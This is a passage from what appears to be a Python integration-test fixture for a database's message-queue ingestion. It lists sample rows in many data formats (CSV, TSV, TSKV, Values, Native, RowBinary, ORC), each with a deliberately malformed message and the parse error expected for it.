'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION _CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> _CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe